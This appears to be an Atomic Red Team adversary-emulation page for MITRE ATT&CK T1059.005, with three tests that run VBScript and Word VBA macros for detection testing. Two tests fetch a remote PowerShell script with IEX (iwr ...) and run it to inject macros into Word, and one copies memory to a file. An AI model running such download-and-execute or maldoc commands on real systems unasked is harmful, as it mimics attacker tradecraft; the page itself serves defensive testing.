# T1059.005 - Command and Scripting Interpreter: Visual Basic
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
<blockquote>

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)

- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)

- [Atomic Test #3 - Extract Memory via VBA](#atomic-test-3---extract-memory-via-vba)


<br/>

## Atomic Test #1 - Visual Basic script execution to gather local computer information
Visual Basic execution test, execute vbscript via PowerShell.

When successful, system information will be written to $env:TEMP\T1059.005.out.txt.

**Supported Platforms:** Windows


**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript | Path to sample script | string | PathToAtomicsFolder&#92;T1059.005&#92;src&#92;sys_info.vbs|


#### Attack Commands: Run with `powershell`! 


```powershell
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
```

#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: Sample script must exist on disk at specified location (#{vbscript})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
```




<br/>
<br/>

## Atomic Test #2 - Encoded VBS code execution
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"

A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word

**Supported Platforms:** Windows


**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa






#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```

#### Cleanup Commands:
```powershell
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
```



#### Dependencies:  Run with `powershell`!
##### Description: The 64-bit version of Microsoft Office must be installed
##### Check Prereq Commands:
```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
```




<br/>
<br/>

## Atomic Test #3 - Extract Memory via VBA
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.

**Supported Platforms:** Windows


**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | string | Word|


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```

#### Cleanup Commands:
```powershell
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```




<br/>